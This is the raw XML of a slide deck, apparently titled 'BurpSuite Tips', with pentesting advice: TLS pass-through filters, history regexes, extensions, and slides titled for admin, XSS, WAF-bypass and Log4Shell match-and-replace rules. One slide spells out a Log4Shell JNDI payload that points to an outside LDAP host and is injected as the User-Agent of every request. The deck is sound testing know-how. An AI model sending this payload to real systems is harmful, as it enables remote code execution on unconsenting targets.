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70" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="257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58" r:id="rId17"/>
    <p:sldId id="259" r:id="rId18"/>
    <p:sldId id="260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437" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-1276" y="-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4087B2-F4D7-4C1B-B1DA-AE6C5B317D6F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858E9-66A2-4394-8F4E-5F6FEE2DDDD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your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, go to Proxy --&gt; Options --&gt; Match and Replace. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add a request header User-Agent: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jdjsjs.xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}. This way all the requests through Burp proxy will have replaced User-Agent with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payload.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8E9-66A2-4394-8F4E-5F6FEE2DDDD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TLS Pass Through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Regex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.*\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.*\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gstatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.*\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mozilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\..*$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.*\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\..*$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.*\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>googleapis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.*\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>goog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\b(?:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>telemetry|detectportalHost:push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858E9-66A2-4394-8F4E-5F6FEE2DDDDC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CB347-42D9-406A-9507-E8E16E759CE5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/13/2023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553D9-8634-4A50-8EC9-FA1641E5AA3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onbottarini.com/2019/06/17/using-burp-suite-match-and-replace-settings-to-escalate-your-user-privileges-and-find-hidden-features/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thexssrat.medium.com/burp-suite-match-and-replace-babac6415cad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daffainfo/match-replace-burp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Leoid/MatchandReplac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9600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tips</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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Effective_Search_In_Burp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Effective_Search_In_Burp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Intruder_Server_Response_Time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Intruder_Server_Response_Tim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Proxy_Show_Hidden_Match_Replace_1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Proxy_Show_Hidden_Match_Replace_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Proxy_Show_Hidden_Match_Replace_2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Proxy_Show_Hidden_Match_Replace_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Proxy_Show_Hidden_Match_Replace_3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Proxy_Show_Hidden_Match_Replace_3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Target_Show_All_HTML_Comments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Target_Show_All_HTML_Comments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2. Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> filtering with negative search in “HTTP History” and Target “Site map” to further clean your testing. Here’s how my personal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> looks like.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Filter Setting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48" y="1928802"/>
            <a:ext cx="8676660" cy="3857652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002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400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3. Use the Extensions library to put your testing on steroids. My personal favorites are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GraphQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Raider, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Autorize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and Upload Scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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4. Save user and project settings as a template and adapt for each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (very time saving!)</a:t>
            </a:r>
            <a:endParaRPr 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5. Automatic backup every 15 minutes (or less!). This feature alone has saved me from a lot of trouble countless times.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. (Bonus): Name your repeater tabs I usually do the majority of testing first, then the report writing. It’s much easier when writing the report, if beforehand, I name my tabs accordingly.</a:t>
            </a:r>
            <a:endParaRPr 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5786" y="428604"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Admin Match and Replace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1785926"/>
            <a:ext cx="6400800" cy="17526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Admin Match and Replac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6" y="1714488"/>
            <a:ext cx="7938286" cy="450718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Intigriti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Match and Replace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Intigriti Match and Replac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22" y="1357298"/>
            <a:ext cx="8880535" cy="5286412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XSS Match and Replace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="XSS Match and Replac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28736"/>
            <a:ext cx="9075526" cy="4214842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WAF Bypass Match and Replace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="WAF Bypass Match and Replac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184" y="1500174"/>
            <a:ext cx="8928816" cy="3000396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Log4Shell Match and Replace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Log 4 Shell Match and Replace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0623" y="1428736"/>
            <a:ext cx="8773342" cy="5143536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2910" y="428604"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Match </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and Replace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44" y="1643050"/>
            <a:ext cx="8786874" cy="5000660"/>
          </a:xfrm>
        </p:spPr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thexssrat.medium.com/burp-suite-match-and-replace-babac6415cad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https://www.jonbottarini.com/2019/06/17/using-burp-suite-match-and-replace-settings-to-escalate-your-user-privileges-and-find-hidden-features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github.com/Leoid/MatchandReplace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github.com/daffainfo/match-replace-burp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1. Use “TLS Pass Through” to cancel out as much noise as possible, and save your configuration to file. Here’s a small portion of my personal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Alternatively, you can use scoping, but I find that as being more restrictive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="TLS Pass Through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0034" y="1977459"/>
            <a:ext cx="8078953" cy="3951872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Basic_Auth_BruteForce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Basic_Auth_BruteForc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315</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>38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BurpSuite Tips</vt:lpstr>
      <vt:lpstr>Admin Match and Replace</vt:lpstr>
      <vt:lpstr>Intigriti Match and Replace</vt:lpstr>
      <vt:lpstr>XSS Match and Replace</vt:lpstr>
      <vt:lpstr>WAF Bypass Match and Replace</vt:lpstr>
      <vt:lpstr>Log4Shell Match and Replace</vt:lpstr>
      <vt:lpstr>Burpsuite Match and Replace </vt:lpstr>
      <vt:lpstr>1. Use “TLS Pass Through” to cancel out as much noise as possible, and save your configuration to file. Here’s a small portion of my personal config. Alternatively, you can use scoping, but I find that as being more restrictive.</vt:lpstr>
      <vt:lpstr>Basic_Auth_BruteForce</vt:lpstr>
      <vt:lpstr>Effective_Search_In_Burp</vt:lpstr>
      <vt:lpstr>Intruder_Server_Response_Time</vt:lpstr>
      <vt:lpstr>Proxy_Show_Hidden_Match_Replace_1</vt:lpstr>
      <vt:lpstr>Proxy_Show_Hidden_Match_Replace_2</vt:lpstr>
      <vt:lpstr>Proxy_Show_Hidden_Match_Replace_3</vt:lpstr>
      <vt:lpstr>Target_Show_All_HTML_Comments</vt:lpstr>
      <vt:lpstr>2. Use regex filtering with negative search in “HTTP History” and Target “Site map” to further clean your testing. Here’s how my personal config looks like.</vt:lpstr>
      <vt:lpstr>Extensions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BurpSuite Tips</dc:title>
  <dc:creator>BLACK HAT ANONYMOUS</dc:creator>
  <cp:lastModifiedBy>BLACK HAT ANONYMOUS</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-19T22:24:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-12T23:31:06Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>